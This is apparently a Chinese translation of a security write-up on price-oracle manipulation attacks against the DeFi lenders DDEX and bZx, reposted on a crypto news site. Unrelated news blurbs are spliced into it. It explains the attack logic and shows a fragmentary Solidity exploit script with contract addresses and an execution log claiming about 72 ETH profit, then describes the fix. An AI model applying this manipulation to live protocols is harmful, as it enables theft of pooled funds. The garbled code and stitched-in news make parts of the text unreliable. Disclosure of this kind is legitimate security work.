通過操控抵押品價格預言機牟利_ETH

譯文出自：登鏈翻譯計劃

譯者：翻譯小組

校對：Tiny熊

太長不看版

因依賴鏈上去中心化的價格預言而不驗證返回的價格，DDEX和bZx容易受到價格操縱攻擊。這導致DDEX的ETH/DAI市場損失ETH流動性，以及bZx中所有損失流動性資金，在本文中，將介紹價格操縱攻擊的原理、如何實施的攻擊、以及如何應對。

什么是去中心化貸款？

首先，讓我們談談傳統貸款。貸款時，通常需要提供某種抵押品，這樣，如果你拖欠貸款，貸方便可以扣留抵押品。為了確定你需要提供多少抵押品，貸方通常會知道或能夠可靠地計算出抵押品的公平市場價值(FMV)。

在去中心化貸款中，除了貸方現在是與外界隔離的智能合約之外，其他過程相同。這意味著它不能簡單地“知道”你提供的任何抵押品的FMV。

為了解決此問題，開發人員指示智能合約查詢價格預言機，該預言機接受代幣地址并返回對應計價貨幣(例如ETH或USD)的當前價格。不同的DeFi項目采用了不同的方法來實現此預言機，但通常可以將它們全部歸類為以下五種方式之一(盡管某些實現比其他實現更模糊)：

鏈下中心化預言機這種類型的預言機只接受來自鏈下價格來源的新價格，通常來自項目控制的帳戶。由于需要使用新匯率快速通知更新預言機，因此該帳戶通常是EOA，而不是多簽錢包。可能需要進行一些合理的檢查，以確保價格波動不會太大。Compound和Synthetix的大多數資產使用這種類型的預言機。

彭博分析師：以太坊期貨ETF通過的幾率高達95%:金色財經報道，彭博分析師Eric Balchunas在社交媒體上稱，目前，我們認為比特幣現貨ETF在年底前獲得批準的幾率為65%，而以太坊期貨ETF獲批的幾率為75%，不過我認為以太坊期貨ETF通過的幾率高達95%。James Seyffart則不太確定。但在現貨方面，我們完全一致。

金色財經此前報道，彭博ETF分析師James Seyffart發布推文稱，目前已收到11只以太坊期貨ETF申請，Proshares申請了第4個以太坊期貨ETF，這個ETF是等權重的比特幣和以太坊ETF。[2023/8/4 16:17:56]

鏈下去中心化預言機這種預言機從多個鏈下來源接受新價格，并通過數學函數(例如平均值)合并這些值。在此模型中，通常使用多簽名錢包來管理授權價格源列表。Maker針對ETH和其他資產使用這種類型的預言機。

鏈上中心化預言機這種類型的預言機使用鏈上價格來源(例如DEX)確定資產價格。但是，只有授權賬號才能觸發預言機從鏈上源讀取。像鏈下中心化預言機一樣，這種類型的預言機需要快速更新，因此授權觸發帳戶可能是EOA而不是多簽錢包。dYdX和Nuo針對一些資產使用這種類型的預言機。

鏈上去中心化預言機這種預言機使用鏈上價格來源確定資產價格，但是任何人都可以更新。可能需要進行一些合理檢查，以確保價格波動不會太大。DDEX將這種類型的預言機用于DAI，而bZx對所有資產使用這種類型的預言機。

愛爾蘭通過歐盟第5項反洗錢指令 強制要求加密公司注冊:據Finance Magnates 4月24日消息，愛爾蘭要求所有虛擬資產服務提供商(VASPs)向該國央行注冊，以確保遵守反洗錢和打擊恐怖主義融資義務。隨著該國將歐盟第5項反洗錢指令（5AMLD）納入當地法律，加密行業新則已得到執行，該指令已于4月23日生效。該規定還將要求向愛爾蘭公民提供服務的外國加密貨幣公司進行注冊。該國央行將評估這些公司在反洗錢/反恐融資政策和程序的有效性。此外，公司的管理層和受益所有者也必須通過可信度測試。5AMLD規則要求金融服務公司進行強制性ML/TF風險評估、客戶盡職調查、交易監控、標記和報告可疑交易，以及保存記錄等。[2021/4/24 20:53:14]

常量預言機這種類型的預言機簡單地返回一個常數，通常用于穩定幣。由于USDC釘住美元，因此上述幾乎所有項目都將這種類型的預言機用于USDC。

問題

在尋找其他易受攻擊的項目時，我看到了這條推文：

老實說，我擔心他們會將其用作價格喂價源。如果我的預感是正確的，那很容易受到攻擊。

—Vitalik非以太贈予者(uint256eth2daiPrice=getEth2DaiPrice();if(eth2daiPrice>0){_price=makerDaoPrice

uint256uniswapPrice=getUniswapPrice();if(uniswapPrice>0){_price=makerDaoPrice

BIS創新中心負責人：比特幣未能通過成為貨幣的測試:金色財經報道，國際清算銀行（BIS）創新中心負責人Benoit Coeure在接受彭博社的采訪時表示，比特幣不斷波動的價值使其無法被視為一種貨幣。Coeure稱，比特幣可以成為一種“投資工具”，但是其沒有通過成為貨幣的測試，也沒有通過作為支付工具的測試，僅僅是因為其價值變化很大。Coeure稱，中央銀行專注于提供流動性和安全性的工具，這就是為什么我們要研究央行數字貨幣。加密貨幣在陽光下占有一席之地，但有所不同，它不是一種支付工具。[2021/3/26 19:18:39]

return_price;}functiongetEth2DaiPrice()publicviewreturns(uint256){if(Eth2Dai

uint256bidDai=Eth2Dai

else{returnbidPrice

}functiongetUniswapPrice()publicviewreturns(uint256){uint256ethAmount=UNISWAP

else{returnuniswapPrice;}}functiongetMakerDaoPrice()publicviewreturns(uint256){(bytes32value,boolhas)=makerDaoOracle

else{return0;}}

動態 | 貸款公司Caliber Home Loans開始通過區塊鏈平臺Provence發起貸款:據美通社消息，大型抵押貸款公司Caliber Home Loans已成為除Figure外第一家在區塊鏈平臺Provence上直接發起貸款的機構。通過在Provence發起、服務和融資貸款，Caliber希望在降低成本、降低風險和提高整個貸款過程中的融資執行力的同時，提供卓越的消費者體驗。[2019/9/8]

參考源碼

為了觸發更新并使預言機刷新其存儲的值，用戶只需調用updatePrice()即可。

functionupdatePrice()publicreturns(bool){uint256_price=peek();if(_price!=0){price=_price;emitUpdatePrice(price);returntrue;}else{returnfalse;}}

參考源碼

攻擊原理

假設我們可以操縱DAI/USD的價格表現。如果是這種情況，我們希望使用它借用系統中的所有ETH，同時提供盡可能少的DAI。為此，我們可以降低ETH/USD的表現價格或增加DAI/USD的表現價格。由于我們已經假設DAI/USD的表現價值是可操縱的，因此我們選擇后者。

為了增加DAI/USD的表現價格，我們可以增加ETH/USD的表現價格，或者降低ETH/DAI的表現價格。基于當前意圖和目的，操縱Maker的預言是不可能的，因此我們將嘗試降低ETH/DAI的表現價值。

加拿大總理：通過使用區塊鏈技術來促進醫用大麻藥品合法化:隨著各國政府合法化大麻藥品的速度超過金融業支持藥品相關交易的能力，區塊鏈技術正在迅速發展的大麻藥品產業中發揮關鍵作用。據加拿大總理賈斯丁?特魯多（Justin Trudeau）稱，加拿大在過去十年中允許使用醫用大麻藥品，將在2018年夏季將醫用大麻藥品合法化。在美國，包括哥倫比亞特區，關島和波多黎各在內的29個州提供醫用大麻計劃，另有19個州允許限制使用與大麻有關的產品。[2017/12/6]

編者注，因為DAI/USD價格=ETH/USD價格÷ETH/DAI價格

預言機通過Eth2Dai取當前要價和當前出價的平均值來計算ETH/DAI的值。為了降低此值，我們需要通過填充現有訂單來降低當前出價，然后通過下新訂單來降低當前要價。

但是，這需要大量的初始投資(因為我們需要先填寫訂單，然后再生成相等數量的訂單)，并且實施起來并不容易。另一方面，我們可以通過在Uniswap大量交易DAI來影響Uniswap中的價格。因此，我們的目標是繞過Eth2Dai邏輯并操縱Uniswap價格。

為了繞過Eth2Dai，我們需要控制價格的波動幅度。我們可以通過以下兩種方式之一進行操作：

清除訂單的一側，而保留另一側。這導致價差正增長

通過列出極端的買入或賣出訂單來強制執行交叉的訂單。這會導致利差下降。

盡管選項2不會因不利訂單而造成任何損失，但SafeMath不允許使用交叉訂單，因此我們無法使用。相反，我們會通過清除訂單的一側來強制產生較大的正價差。這將導致DAI預言機回退到Uniswap來確定DAI的價格。然后，我們可以通過購買大量DAI來降低DAI/ETH的Uniswap價格。一旦操縱了DAI/USD的表現價值，便像往常一樣借貸很簡單。

攻擊演示

以下腳本將通過以下方式獲利約70ETH：

清除Eth2Dai的賣單，直到價差足夠大，以致預言機拒絕價格

從Uniswap購買更多DAI，價格從213DAI/ETH降至13DAI/ETH

用少量DAI(?2500)借出所有可用ETH(?120)

將我們從Uniswap購買的DAI賣回Uniswap

將我們從Eth2Dai購買的DAI賣回Eth2Dai

重置預言機(不想讓其他人濫用我們的優惠價格)

contractDDEXExploitisScript,Constants,TokenHelper{OracleLikeprivateconstantETH_ORACLE=OracleLike(0x8984F1CFf1d614a7404b0cfE97C6fa9110b93Bd2);DaiOracleLikeprivateconstantDAI_ORACLE=DaiOracleLike(0xeB1f1A285fee2AB60D2910F2786E1D036E09EAA8);ERC20LikeprivateconstantHYDRO_ETH=ERC20Like(0x000000000000000000000000000000000000000E);HydroLikeprivateconstantHYDRO=HydroLike(0x241e82C79452F51fbfc89Fac6d912e021dB1a3B7);uint16privateconstantETHDAI_MARKET_ID=1;uintprivateconstantINITIAL_BALANCE=25000ether;functionsetup()public{name("ddex-exploit");blockNumber(8572000);}functionrun()public{begin("exploit")

functioncheckRates()external{uintethPrice=ETH_ORACLE

uintprivateboughtFromMatchingMarket=0;functionskewRates()external{skewUniswapPrice();skewMatchingMarket();require(DAI_ORACLE

functionskewUniswapPrice()internal{DAI

functionskewMatchingMarket()internal{uintstart=DAI

boughtFromMatchingMarket=DAI

functionsteal()external{HydroLike

functioncleanup()external{DAI

functioncheckProfits()external{printf("profits=%

}/*###runningscript"ddex-exploit"atblock8572000####executingstep:exploit#####calling:checkRates()eth=213.440000000000000000dai=1.003140638067989051#####calling:skewRates()#####calling:checkRates()eth=213.440000000000000000dai=16.058419875880325580#####calling:steal()ethWanted=122.103009983203364425daiNeeded=2435.392672403537525078#####calling:cleanup()#####calling:checkProfits()profits=72.140629996890984407####finishedexecutingstep:exploit*/

解決方案

DDEX團隊通過部署新的預言機解決了此問題這對DAI的價格設置了合約價格界限，目前將其設置為0.95和1.05。

本文來源于非小號媒體平臺：

登鏈社區

現已在非小號資訊平臺發布105篇作品，

非小號開放平臺歡迎幣圈作者入駐

入駐指南：

/apply_guide/

本文網址：

/news/9559363.html

免責聲明：

1.資訊內容不構成投資建議，投資者應獨立決策并自行承擔風險

2.本文版權歸屬原作所有，僅代表作者本人觀點，不代表非小號的觀點或立場

上一篇：

幣安為何推出第三條鏈？這對BNB意味著什么？

Tags：DAIETHPRIRICECDAI幣有人讓我弄ETH是騙子嗎Loopring [NEO]Price Gap

POL幣最新價格